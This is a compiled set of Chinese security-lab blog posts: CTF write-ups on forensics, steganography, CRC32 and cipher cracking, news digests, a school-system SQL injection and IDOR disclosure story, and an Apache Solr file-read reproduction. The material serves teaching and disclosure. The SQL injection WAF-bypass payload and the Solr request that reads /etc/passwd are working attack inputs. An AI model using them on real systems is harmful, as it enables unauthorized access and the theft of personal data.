你是否正在收集各类网安网安知识学习，蚁景网安实验室为你总结了1300+网安技能任你学，https://www.yijinglab.com/loginLab.do#stu>>  这是一道取证分析题目，主要考察取证分析能力，包括磁盘文件恢复、图片文件修复、数据分析、图片隐写信息提取等。 本次实验题目地址：https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015073111025900001。 题目提供了一个disk.img文件，我们首先可以尝试使用DiskGenius来查看其中的文件。打开DiskGenius_4.3.exe，依次选择“硬盘”、“打开虚拟硬盘文件”菜单项，如下图所示： 使用DiskGenius打开C:\CTF\DiskForensics\4\disk.img文件之后，可以看到在磁盘的根目录下存在有三个1.6MB的文件，文件名分别为21638、53564、70597，如下图所示： 我们选中这三个1.6MB的文件后单击右键菜单，在弹出的菜单中选择“复制到(S)...”，将其复制到C:\CTF\DiskForensics\4\Files目录下，如下图所示： 既然是取证那我们来看一下从磁盘镜像中是否可以恢复出已删除的文件。在DiskGenius主界面左侧的树形控件中选中VD0:disk.img(15MB)之后，点击工具栏上的“恢复文件”按钮，如下图所示： 等待操作完成之后，我们可以看到一共恢复出了5个新文件，其中有4个1.6MB的文件以及1个1.7MB的文件，如下图所示： 同样选中这5个文件之后单击鼠标右键，在弹出的右键菜单中选择“复制到(S)...”，将这5个文件恢复到C:\CTF\DiskForensics\4\Files目录下。 现在我们已经从disk.img文件中提取出了八个文件，但是这八个文件都没有扩展名，所以我们可以考虑使用TrID工具来识别一下。打开CMD命令提示符，切换到C:\CTF\DiskForensics\4\Files目录，输入trid *即可扫描该目录下的所有文件，但是很遗憾的是TrID并没有识别出任何一个文件的类型，如下图所示： 识别不出呢，咋办呢。 别慌我们还有linux的file命令，我们已经把提取出来的八个文件放到Linux实验机器的/home/forensics/defcon目录下了。现在切换到Linux实验主机，使用cd命令切换到/home/forensics/defcon目录之后，执行file *来对文件进行扫描，跟TrID一样，file命令也识别不出任何结果，如下图所示： 莫慌，这肯定是数据被破坏了，我们还可以手动识别 打开十六进制编辑器C32Asm（位于C:\Tools\c32asm\C32Asm.exe），使用C32Asm打开!2467文件，可以看到文件的前面两个字节为00 00，显然文件头部字节被抹掉了，而如果来到文件末尾，可以看到最后的两个字节是FF D9，如下图所示： \3. 因为最后面两个字节是FF D9，所以有可能是一个JPG文件，因为JPG文件的头部两个字节是FF D8，而末尾两个字节是FF D9，所以我们可以把最前面的两个字节填充为FF D8，然后按下Ctrl+S保存对文件的修改； \4. 给文件!2467添加.jpg扩展名，打开发现可以正常显示，说明这就是一个JPG文件； \5. 经过同样的操作，我们可以发现!8808、!8938、21638、53564、70597这五个文件也是JPG文件，而!1728、!8149则无法直接看出是什么文件； 这里我们发挥一下想象，这六个图片文件中有两个文件显示的图像是一样的，经过对比发现两个文件的大小不一样，其中前者为1.63 MB (1,714,910 字节)，后者为1.59 MB (1,670,111 字节)。 此事必有蹊跷，对比一下两个文件看下 \1. 打开UltraCompare（位于C:\Tools\UltraCompare\uc.exe）； \2. 依次点击“模式”、“二进制（快速）模式”菜单项； \3. 单击文件夹图标选中两个要比较的文件，单击绿色箭头图标开始比较，如下图所示； \4. 比较之后可以发现，两个文件的二进制数据存在大量差异之处，如下图所示； 经过上面的分析，发现两个图片文件大部分的二进制内容是不一样的，可以知道这里不是简单的在图片末尾附加数据。 别慌我可以使用stegdetect工具来检查一下。现在切换到Linux实验机器来进行操作，具体的实验步骤如下： \1. 通过cd命令切换到/home/forensics/defcon2目录，我们已经把上面的两个JPG文件复制到该目录下了； \2. 使用stegdetect检测两个图片文件，发现都提示negative，即并没有检测出隐写信息，如下图所示； \3. 调整stegdetect的敏感度（通过-s参数指定），设定敏感度为2.0，再次检测两个文件，发现文件!2467.jpg存在outguess隐写信息，如下图所示； 到现在为止，我们基本推测出了文件!2467使用了outguess来隐藏了隐写信息，现在我们可以使用outguess来提取其中的隐写信息，在Linux中执行outguess -r !2467.jpg data.txt即可，如下图所示： 看来是的很有可能是outguess提取隐写信息的时候需要指定一个密码，这时候可以编写一个脚本来破解这个密码，由于不知道密码的构词规则，所以可以使用暴力破解或者是字典破解的方法（可以暴力破解5个字母的密码，或者使用字典进行破解）。 最终破解出的密码是ddtek（曾经组织过DEFCON CTF的一个队伍名称），同时在使用outguess提取隐写信息的时候还要指定-e参数，表示需要使用错误纠正编码，完整的命令为outguess -r !2467.jpg -k "ddtek" data.txt -e。待提取完毕后，执行file data.txt可以知道这是一个ZIP文件，如下图所示： 这个在linux服务器上面呢，服务器的IP地址为10.1.1.47，我们在这里执行nohup python -m SimpleHTTPServer 8888 &即可在服务器上监听8888端口，在XP下的Firefox浏览器中下载http://10.1.1.47:8888/data.txt即可，下载之后将其重命名为data.zip并解压出其中的文件，打开解压出来的PDF文件即可看到Flag。 如果看完这一篇还不过瘾的话可以去实验室做实验继续学习哦。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、黑客论坛出售8.2 TB MobiKwik用户敏感数据 https://www.technadu.com/8-2-tb-sensitive-data-of-mobikwik-users-sold-on-hacker-forum/259858/ 2、PHP的Git服务器遭到黑客攻击代码库被篡改 https://www.bleepingcomputer.com/news/security/phps-git-server-hacked-to-add-backdoors-to-php-source-code/ 3、澳大利亚第九频道的IT网络遭到黑客攻击 https://securityaffairs.co/wordpress/116053/breaking-news/channel-nine-cyber-attack.html 4、研究人员批量 npm netmask 库存在严重漏洞 https://www.bleepingcomputer.com/news/security/critical-netmask-networking-bug-impacts-thousands-of-applications/ 5、巴西一家保险公司泄露了3600万客户的数据 https://www.defcon-lab.org/data-breach-seguradora/ 6、研究人员披露Linux新漏洞可绕过Spectre攻击缓解措施 https://thehackernews.com/2021/03/new-bugs-could-let-hackers-bypass.html 7、Ziggy勒索软件管理员宣布将退还受害者支付的赎金 https://securityaffairs.co/wordpress/116079/malware/ziggy-ransomware-refunds-victims.html 8、Ovarro的TBox远程终端单元（RTU）被发现多个严重漏洞 https://thehackernews.com/2021/03/flaws-in-ovarro-tbox-rtus-could-open.html 9、200 Networks 公司呼叫中心遭重大数据泄露 https://www.hackread.com/call-center-provider-experiences-data-leak 10、研究人员发现新的基于DCCP请求的DDoS攻击向量 https://cyware.com/news/new-dccp-request-based-ddos-attack-vector-emerges-382cf003

你是否正在收集各类网安网安知识学习，蚁景网安实验室为你总结了1300+网安技能任你学，https://www.yijinglab.com/loginLab.do#stu>> CRC全称为Cyclic redundancy check，即循环冗余校验码，是一种根据输入数据产生简短的固定位数校验码的散列函数。CRC主要用来检测或者校验数据经过传输或者保存后可能出现的错误，CRC32产生32位的散列值（即4字节）。CRC32可以用于数据的校验，在WinRAR等压缩软件中也使用了这一技术，压缩包中每个文件都保存有一个对应的CRC32值，这个值是对压缩前的文件数据计算出来的散列值，在进行解压时会再次计算文件的CRC32值来进行对比，判断压缩包文件是否损坏。尽管CRC32在错误检测中非常有用，但是并不能可靠地校验数据完整性（即数据没有发生任何变化），这是因为CRC多项式是线性 本次实验地址：https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015011915463900001。 先来看一下题目，在实验主机上的C:\Crypto\2目录下的flag.zip为本题所提供的文件，请对flag.zip文件进行分析，提取出压缩包中7个txt文件的内容，然后找出Flag字符串。 这个题目意在考察选手对CRC32的了解，以及通过CRC32枚举来还原压缩包文件内容的方法。 实验步骤一、思路分析 打开flag.zip压缩包文件，发现里面有7个txt文件，但是压缩包经过加密了，所以无法直接对其进行解压操作。题目除了这个压缩包之外没有提供任何提示，使用十六进制编辑器查看flag.zip文件似乎也找不到可疑的信息，那么可行的方法似乎就只有一个了，那就是对密码进行暴力破解操作。 暴力破解无非是使用可能的密码尝试进行解压操作，可行的方法有两种： \1. 通过密码字典收集的常用密码进行破解； \2. 通过穷举可能的密码进行破解； 对于第一种方式而言，如果机器性能足够好，几千万的密码字典可以很快就跑完；对于第二种方式而言，穷举的空间是非常大的，因为RAR压缩文件密码的最大长度为127个字符，而且不局限于英文字符，因此完全的暴力破解是不可能的。 密码破解并不是本题的出题初衷，这里将介绍一种基于CRC32来还原压缩包内容的方法。观察flag.zip在WinRar中的显示信息，如下图所示： 在WinRAR下方的列表视图中，最后一列是CRC32值，这个值代表的是对应的文件在压缩之前的内容计算出来的CRC32散列值，考虑到这里每个txt文件原始的大小只有4个字节，因此我们可以尝试枚举可能的4字节内容，然后计算CRC32值来进行校验。4字节的枚举空间并不是无法接受，因此可以尝试这样的操作。 这样我们就完成了第一个步骤，接下来开始实验步骤二、CRC32计算 为了快速方便的还原压缩包的内容，我们需要编程来计算CRC32的值。计算CRC32可以有多种方法，可以从网上找一个实现好的C/C++源文件，也可以使用Python提供的库函数来进行计算，这里我们选择后者。 Python的binascii模块提供了一个crc32方法，可以方便的计算所给参数的CRC32值。但是这里的计算结果有一点问题，因为计算出来的结果是一个有符号数，所以可能会看到结果为负数，因此需要将结果和0xFFFFFFFF进行一个位运算与操作。Python计算CRC32的代码如下： import binascii def calcCRC32(s): crc = binascii.crc32(s) return crc & 0xFFFFFFFF 需要注意的是，前面提到CRC32会存在冲突的可能，也就是说，不同的内容在经过计算后得到的CRC32散列值可能是一样的。 这都是出题人布置的陷阱，你自己做实验的时候要注意，最后一步，实验步骤三、使用脚本进行快速破解 经过前面的分析，我们已经知道了可以通过CRC32来还原压缩包中的4字节文本，以及通过Python计算CRC32的方法，现在只需要给Python脚本添加枚举功能即可，代码如下： #!/usr/bin/env python # -- coding:utf-8 -- import datetime import binascii def showTime(): print datetime.datetime.now().strftime("%H:%M:%S") def crack(): crcs = set([0xE761062E, 0x2F9A55D3, 0xF0F809B5, 0x645F52A4, 0x0F448B76, 0x3E1A57D9, 0x3A512755]) r = xrange(32, 127) for a in r: for b in r: for c in r: for d in r: txt = chr(a)+chr(b)+chr(c)+chr(d) crc = binascii.crc32(txt) if (crc & 0xFFFFFFFF) in crcs: print txt if name == "main": showTime() crack() showTime() 在命令行下运行上面的Python脚本，等待一段时间后即可看到结果，具体的运行时间由机器的配置决定（经测试，实验机器只需要两分钟左右的时间即可完成破解，破解过程因为占用CPU比较高，因此可能会比较卡，耐心等待即可）。运行结果如下图所示： 这里不到两分钟就完成了整个枚举过程，得到的字符串为：FLAG, assw, dono, ed_p, ord}, t_ne, {we_，我们尝试对其进行拼接，得到一个有意义的结果为：FLAG{we_donot_need_password}，这就是我们所要找的Flag字符串。 这个技术你学会了吗？加入网安实验室，1300+网安技能任你学！

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Apple发布紧急安全更新修复严重零日漏洞 https://www.securityweek.com/apple-patches-under-attack-ios-zero-day 2、欧盟与美国达成隐私数据交换协议 https://www.securityweek.com/eu-us-make-new-attempt-data-privacy-deal 3、卡巴斯基报告称针对发达国家的ICS设备勒索攻击呈上升趋势 https://www.securityweek.com/kaspersky-sees-rise-ransomware-attacks-ics-devices-developed-countries 4、官方“ Facebook for WordPress”插件中发现严重漏洞 https://www.securityweek.com/severe-flaws-official-facebook-wordpress-plugin 5、Weintek HMI 存在远程攻击漏洞 https://www.securityweek.com/vulnerabilities-can-allow-attackers-remotely-gain-control-weintek-hmis 6、Hades勒索软件团伙针对美国的大型组织 https://securityaffairs.co/wordpress/115994/cyber-crime/hades-ransomware.html 7、QNAP警告正在针对NAS设备的暴力破解活动 https://www.bleepingcomputer.com/news/security/qnap-warns-of-ongoing-brute-force-attacks-against-nas-devices/ 8、研究人员发现英特尔处理器新的严重漏洞 https://www.ehackingnews.com/2021/03/black-code-two-critical-vulnerabilities.html 9、美国军事承包商PDI集团遭勒索软件攻击数据泄露 https://therecord.media/ransomware-gang-leaks-data-from-us-military-contractor-the-pdi-group/ 10、专家发现新的复杂Android间谍软件冒充系统更新 https://securityaffairs.co/wordpress/116016/malware/android-spyware-system-update.html

你是否正在收集各类网安网安知识学习，蚁景网安实验室为你总结了1300+网安技能任你学，https://www.yijinglab.com/loginLab.do#stu>> 今天进行的实验室Crypto种的替换密码。首先介绍一下工具，在解决这类题型的时候，我们不仅要运用到计算机知识，还有一部分密码学知识。 本次实验地址：https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015011915454100001。 首先介绍一下工具，在解决这类题型的时候，我们不仅要运用到计算机知识，还有一部分密码学知识。 本实验要求实验者具备如下的相关知识。 一、替换密码 替换密码是古典密码学中的一种加密方法，其按照特定的规律对文件进行加密。在最简单的替换密码中，通过将一个字符映射为另一个字符的方式来进行加密，比如对ASCII码表做一个映射，可以将密文设置为明文的下一位，如字符a映射为字符b，即可完成简单的替换加密。 二、凯撒密码 凯撒密码替换密码中最为典型的代表。凯撒密码非常简单，就是对字母表中的每个字母，用它之后的第三个字母来代替。例如： 在凯撒密码中字母表是循环的，即认为紧随Z后的字母是A，因此最后一个单词party中，y的密文是B。 当凯撒密码的移位间隔为13时，就是ROT13编码了，因为英文字母表只有26个字母，而对ROT13而言，加密和解密的间隔都是一样的，因此同样的一段文字经过两次ROT13变换后就可以得到自身，即加密和解密是完全一样的操作。 三、英文字母频率 字母频率，就是指各个字母在文本材料中出现的频率。统计表明，在英语语料中各个字母的频率分布是有规律的，比如最常见的字母是e。英语中各个字母大致的频率分布如下图所示： 学习这些的主要目的是了解CTF竞赛中的密码学题型、凯撒密码、基于频率的替换密码破解方法。 接下来开始准备实验环境，我们需要的辅助工具有Python，substitution_cipher_solver，JPK。 先来看题目，在实验主机上的C:\Crypto\1目录下为本题所提供的文件（password.txt以及secret.rar两个文件），请对这些文件进行分析，找到Flag字符串。 文件找到了，该怎么分析呢？ 这道题意图在于考察选手对密码学中替换密码的了解，包括凯撒密码及其变形以及基于英文字母频率对单表代替密码的破解方法。 实验步骤一、凯撒密码破解 题目提供了两个文件：password.txt以及secret.rar文件，其中压缩包文件经过了加密，需要密码才能进行解压操作，而password.txt文件中给出了一个hint，提示Caesar以及字符串Mkockb_1c_o4cI。 打开桌面上的JPK工具，输入字符串Mkockb_1c_o4cI，然后依次在菜单项中选择“Ascii”、“Decrypt”、“Caesar”，就可以看到所有可能的结果了，仔细观察输出的结果，可以看到比较有意义的字符串为Caesar_1s_e4sY，如下图所示： 经过测试，发现Caesar_1s_e4sY就是正确的解压密码。 实验步骤二、单表代替密码分析 打开secret.txt文件，得到的内容如下： oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa. yjkn kn vjqy yja uquab saam kn qpixy: gix nxprky q uquab, va backav ky qom ky dayn uxpeknjam. oi oaam yi vqky q rioyj ib yvi xoyke gix naa gixb qbykzea ko yja oafy ujbqzw k 这里可以尝试对这段文本进行凯撒密码变换，但是尝试1-13这些偏移都看不到任何有意义的结果，因为这里不再使用简单的凯撒变换了，这里使用的是任意的单表代替。在凯撒密码中，所有的字符经过变换后，他们的偏移量都是一样的，比如a经过变换后得到d，那么b经过变换后就是e；而在任意的单表代替中，每个字符都唯一映射到另一个字符，字符串映射之间是没有规律的。 经过使用暴力方式对此类加密进行破解非常麻烦，但是可以使用语言的一些规律对其发起攻击。首先把字母使用的相对频率统计出来，与英文字母的使用频率分布进行比较，可以猜测出一部分映射，然后配合对英语中的构词规律的分析，就可以猜测出其他的映射，按照这个思路基本就能完成密码分析过程。 页面http://cryptoclub.org/tools/cracksub_topframe.php提供了一个方便的操作界面供我们对此类问题进行分析（实验主机不提供网络访问，请在自己的电脑上访问这个页面）。打开该页面然后填入密文，点击Crack，如下图所示： 接下来就可以从频率上对密文进行分析了。根据右侧的频率统计，我们可以尝试对前面四个字母进行替换，在左侧的矩形文本框中，在密文对应字符的上面可以填写解密后的明文，因此，这里得到的密文到明文的映射为：A-e, Y-t, Q-a, I-o。 在英文单词构词方面，以密文第二个单词YJA为例，经过分析后我们得到的结果为t*e，而字符J在密文中的频率为5.9%，对应英文文本中可能的字符为i, n, s, h, r，经过分析，只有the才是有意义的单词，因此我们可以猜测密文J对应明文h。 经过这样不断的分析，我们最终就能还原出明文了。 下来就是实验步骤三、使用脚本进行快速破解 使用实验步骤二中提供的页面，可以完成对密文的破解，但是需要耗费一定的时间和精力，使用已有的成熟的解密脚本，我们可以快速完成破解过程。 页面https://github.com/alexbers/substitution_cipher_solver提供了一个Substitution Cipher Solver工具，可以快速完成对单表替换类密码的分析。从地址https://github.com/alexbers/substitution_cipher_solver/archive/master.zip可以下载到这个工具（或者从http://heetian.qiniudn.com/crypto/substitution_cipher_solver.zip下载，在实验主机的C:\Crypto\1\ substitution_cip nowadays, the world seems to turn faster than a couple of years ago. time has come to reflect that also in the phrack magazine. this is what the paper feed is about: you submit a paper, we review it and it gets published. no need to wait a month or two until you see your article in the next phrack i 从明文的最后一句话可以知道，flag为cryptooosocoolamiright。 layfair加密方式同时对两个明文字符进行替换加密，查阅资料了解Playfair密码。 原理和过程，以后在CTF的题目中稍微变化一下，可能你就不认识了。 你想在靶场学习CTF技术吗？

你是否正在收集各类网安网安知识学习，蚁景网安实验室为你总结了1300+网安技能任你学，https://www.yijinglab.com/loginLab.do#stu>> 在一次edusrc挖掘中，发现了一个系统，对于学校来讲算是及其重要的一个系统，其中部署这大批量的教师+学生信息 同时这个功能点的验证码可以被绕过，拦截重放Intruder进行BP爆破，献上我的大字典并没有任何结果，阿巴阿巴.... 爆破无法成功，尝试一波sql注入，照理来讲这种子域下重要的系统应该会有waf等一系列防护操作，即使这样还是需要试试。上来一个admin’ 发现报错。笃定大概率有sql，还是iis搭建的 尝试利用admin’ or ‘1’=’1 密码123456手法 来嗅探系统中是否存在密码为123456的用户，当我开心敲下空格，阿巴阿巴.... 有限制 尝试绕waf，发现当 or 两侧拥有空格时，or这个关键字会被waf拦截，当尝试使用/**/注释符来绕过时发现依旧会产生报错，或许可能是对于等于号进行了限制，利用LIKE尝试，依旧是提示检测到非法字符 从上文的报错可以知道是用的iis7.5搭建，mssql数据库，内敛注释仅被mysql解析，多次FUZZ发现是对于//注释符进行了过滤，那么就在//中任意添加字符串，这边还有前端长度限制，直接F12改maxlength值，同时此系统的应该是没有存在123456密码的用户。换种思路，能来证明其存在注入，让其报错 返回服务器版本信息。 Payload:whskxk'/!&/or/!&/convert(int,@@version)=1/!&/AND/!&/'1'LIKE'1 成功返回服务器版本信息 已经知道此类系统存在SQL 用fofa进行查找 进入其它系统来寻找后台漏洞，发现存在68个类似使用此系统的学校 发现一处可以进入的学校，打入payload 密码123456 当我们利用payload进入系统的时候，发现存在两个功能点，第一个是权限较低的用户，第二个是管理员用户，当点击此功能点的时候 会发现下面有一个地址携带敏感的工号（这个之前在两个功能点都进去之后，没有莫得特别严重的漏洞，回过头来摸索的时候发现的。挖洞讲究的是细心+耐心） 感觉有戏，打开无痕模式 复制此URL，同时将Userid的值修改成admin。 我德西玛 精神小伙，虎躯一震，揉揉眼睛。全校学生个人信息到手，教师的个人信息也同时到手。其家庭成员信息也到手,阿巴巴阿巴.... 回想FOFA搜集到的资产+未授权访问.... EDUSRC冲分！！！ GOGOGO!!! 涉及漏洞均已提交EDUSRC，同时涉及院校都已积极修复响应。遵守网络安全！共筑美好社会! 你想在靶场学习CTF技术吗？

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Solarwinds 发布更新修复新的严重漏洞 https://www.securityweek.com/new-code-execution-flaws-solarwinds-orion-platform 2、OpenSSL 发布1.1.1k修补了两个高危漏洞 https://www.securityweek.com/openssl-111k-patches-two-high-severity-vulnerabilities 3、黑客开始利用Thrive Theme WordPress插件中的最新漏洞 https://www.securityweek.com/hackers-start-exploiting-recent-vulnerabilities-thrive-theme-wordpress-plugins 4、Mamba Ransomware利用DiskCryptor进行加密 https://www.securityweek.com/mamba-ransomware-leverages-diskcryptor-encryption-fbi-warns 5、3000万美国人受Astoria公司数据泄露的影响 https://securityaffairs.co/wordpress/115934/breaking-news/astoria-company-data-leak.html 6、Microsoft修复Windows PSExec特权提升漏洞 https://www.bleepingcomputer.com/news/security/microsoft-fixes-windows-psexec-privilege-elevation-vulnerability 7、英国服装零售商Fat Face遭黑客入侵数据泄露 https://www.inforisktoday.com/british-clothing-retailer-fat-face-discloses-data-breach-a-16249 8、安全机构在互联网上的Exchange中检测到数十万个Webshell https://searchsecurity.techtarget.com/news/252498373/Nearly-100000-web-shells-detected-on-Exchange-servers 9、XcodeSpy 通过Xcode项目传播恶意软件 https://cyware.com/news/trojanized-xcode-project-spreads-macos-malware-1a2f1982 10、Slack Connect DM新功能存在安全隐患 https://www.securityweek.com/new-slack-connect-dm-feature-raises-security-concerns

你是否正在收集各类网安网安知识学习，蚁景网安实验室为你总结了1300+网安技能任你学，https://www.yijinglab.com/loginLab.do#stu>>  最近遇到一个CTF题目，上面就一张图片是什么？啥都看不出来。今天来看一下CTF图片隐写题目，在图片里面隐藏一些不为人知的flag呢？ 本次实验的地址为：《CTF Stegano练习之隐写6》。 首先来看题目。在实验主机上的C:\Stegano\6目录下提供了pic1.jpg以及pic2.jpg两个文件，请对这两文件进行分析，找到一个由两个英文单词组成的字符串Flag。 这两张图看起来都感觉都差不多全是黑白像素点，怎么去找flag呢？ 这里有一个神器StegSolve，使用StegSolve提取Flag打开桌面上的StegSolve，然后选择菜单项“File”、“Open”打开pic1.jpg，然后选择菜单项“Analyse”、“Image Combiner”选择pic2.jpg文件，默认的XOR操作就可以看到Flag了，如图所示： 经过简单的分析，我们发现两个图片的尺寸都是300*300，而且文件大小都是71.6KB，所以就不可能存在某一个文件中隐藏了额外的数据的情况了。那么我们可以对两个文件进行结合分析，即将两个文件的像素RGB值进行XOR、ADD、SUB等操作，看看是否能看到有用的信息。而StegSolve可以十分方便的实现这些操作。 但是使用工具也有一点不好，就是工作的扩展性几乎为零，不能进行批量的自动化处理，而对于自己编写的脚本，自然可以十分方便的进行扩展，可以根据实际需求进行各种定制，并进行批量的自动化处理等。 对于这类题目强烈推荐使用Python的PIL库，脚本“C:\Stegano\6\xorImg.py”的源代码如下： #!/usr/bin/env python # -- coding:utf-8 -- from PIL import Image def loadImage(filename): img = Image.open(filename) width, height = img.size img = img.convert("RGB") pixel = img.load() return width, height, pixel def combineImage(file1, file2, file3): w1, h1, p1 = loadImage(file1) w2, h2, p2 = loadImage(file2) width = min(w1, w2) height = min(h1, h2) img = Image.new("RGB", (width, height)) pix = img.load() for y in xrange(0, height): for x in xrange(0, width): r1, g1, b1 = p1[x, y] r2, g2, b2 = p2[x, y] pix[x, y] = r1^r2, g1^g2, b1^b2 img.save(file3) if name == "main": combineImage("pic1.jpg", "pic2.jpg", "pic3.jpg") 双击运行这个python脚本，就可以得到处理结果pic3.jpg，打开该图片就可以看到Flag字符串了，为AZADI TOWER。 脚本的代码比较简单，大致就是使用loadImage函数得到图片的长度、宽度、像素矩阵，然后在函数combineImage中对两个矩阵的像素点进行异或运算，并保存到第三张图片中。注意当两张图片的尺寸不一样的时候，我们进行了额外的处理，即只取最小的长度和宽度。 但是你这里只有XOR脚本，没有其他的。 下面继续来写一个通用的脚本，我们可以对该脚本进行修改，增加其可扩展的灵活性，通过定义一个运算函数实现通用的处理功能，比如我们可以定义xor、or、and三个操作的函数，就可以得到三个不同的处理结果了。脚本“C:\Stegano\6\combineImg.py”的源代码如下： #!/usr/bin/env python # -- coding:utf-8 -- from PIL import Image def xorFun(x, y): return x^y def orFun(x, y): return x|y def andFun(x, y): return x&y def loadImage(filename): img = Image.open(filename) width, height = img.size img = img.convert("RGB") pixel = img.load() return width, height, pixel def combineImage(file1, file2, file3, func): w1, h1, p1 = loadImage(file1) w2, h2, p2 = loadImage(file2) width = min(w1, w2) height = min(h1, h2) img = Image.new("RGB", (width, height)) pix = img.load() for y in xrange(0, height): for x in xrange(0, width): r1, g1, b1 = p1[x, y] r2, g2, b2 = p2[x, y] pix[x, y] = func(r1,r2), func(g1,g2), func(b1,b2) img.save(file3) if name == "main": combineImage("pic1.jpg", "pic2.jpg", "xor.jpg", xorFun) combineImage("pic1.jpg", "pic2.jpg", "or.jpg", orFun) combineImage("pic1.jpg", "pic2.jpg", "and.jpg", andFun) 这个题目不仅仅要会代码，重要的是从题目中找出隐写信息。因为题目有一定难度，才导致CTF比赛这么有竞争力。 如果看完这一篇还不过瘾的话可以去实验室做实验继续学习哦。

你是否正在收集各类网安网安知识学习，蚁景网安实验室为你总结了1300+网安技能任你学，https://www.yijinglab.com/loginLab.do#stu>>  漏洞简介 Apache Solr是一个开源搜索服务引擎，默认安装未授权情况下攻击者可以构造恶意HTTP请求读取目标Apache Solr服务器的任意文件。 本文涉及相关实验：https://www.yijinglab.com/expc.do?ec=ECIDde9d-11f0-4ac2-921f-b04f7e137c75 （Apache Solr是一个开源的搜索服务器。具有高度可靠、可伸缩和容错的，提供分布式索引、复制和负载平衡查询、自动故障转移和恢复、集中配置等功能。） 影响版本 solr任意版本 环境搭建 漏洞环境下载： https://archive.apache.org/dist/lucene/solr/8.8.0/solr-8.8.0.tgz解压后进入bin目录，启动（需要java环境）， ./solr start 此时启动的solr是没有核心进行索引和搜索的，创建一个节点（核心） ./solr create -c test 访问：http://ip:8983可以看到创建的核心 实际场景下可以看到会有很多核心 漏洞复现 启用远程流传输 访问http://ip:8983/solr/test/config/抓包，将请求包修改为POST请求，修改Content-Type为“application/json”，发送以下数据： {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} 即可开启远程流。 读取文件 引入远程流，将stream.url的参数的内容作为流传递。正常情况下stream.url传入的内容为“stream.url=http:/http://www.remotesite.com/path/to/file.pdf”,构造传入的敏感文件 POST /solr/test/debug/dump?param=ContentStreams HTTP/1.1 Host: 192.168.74.139:8983 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.57 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-GB;q=0.8,en;q=0.7,en-US;q=0.6 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 29 stream.url=file:///etc/passwd 漏洞修复 （官方不承认这是漏洞.jpg） 因为solr默认安装情况下未授权，导致可以读取任意文件，启用Apache Solr身份验证可有效缓解该漏洞的影响 配置访问控制策略，避免Apache Solr暴露在互联网 参考 https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ 如果看完这一篇还不过瘾的话可以去实验室做实验继续学习哦。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、航空租赁公司Solairus Aviation遭受数据泄露 https://www.securityweek.com/air-charter-firm-solairus-aviation-suffers-data-breach 2、TBox RTU中漏洞可能会使工业组织遭受远程攻击 https://www.securityweek.com/vulnerabilities-tbox-rtus-can-expose-industrial-organizations-remote-attacks 3、霍尼韦尔表示IT系统遭恶意软件破坏 https://www.securityweek.com/honeywell-says-malware-disrupted-it-systems 4、思科修复了Cisco Jabber客户端软件中的严重漏洞 https://securityaffairs.co/wordpress/115931/security/cisco-jabber-critical-flaw.html 5、外汇经纪商FBS泄露数百万用户详细数据 https://securityaffairs.co/wordpress/115925/data-breach/fbs-data-breach.html 6、选举前，黑客泄露了数百万以色列选民的详细信息 https://securityaffairs.co/wordpress/115918/hacking/israeli-voters-leak.html 7、微软透露全球92% Exchange已得到修补或缓解 https://securityaffairs.co/wordpress/115896/security/microsoft-exchange-patched.html 8、TrickBot利用网络钓鱼加速传播 https://cyware.com/news/trickbot-spreading-actively-launches-phishing-schemes-ba2f050b 9、服务器制造商Stratus Technologies遭勒索软件攻击 https://www.bleepingcomputer.com/news/security/high-availability-server-maker-stratus-hit-by-ransomware/ 10、美国保险公司CNA遭网络攻击导致网络中断 https://www.securityweek.com/insurer-cna-says-cyberattack-caused-network-disruption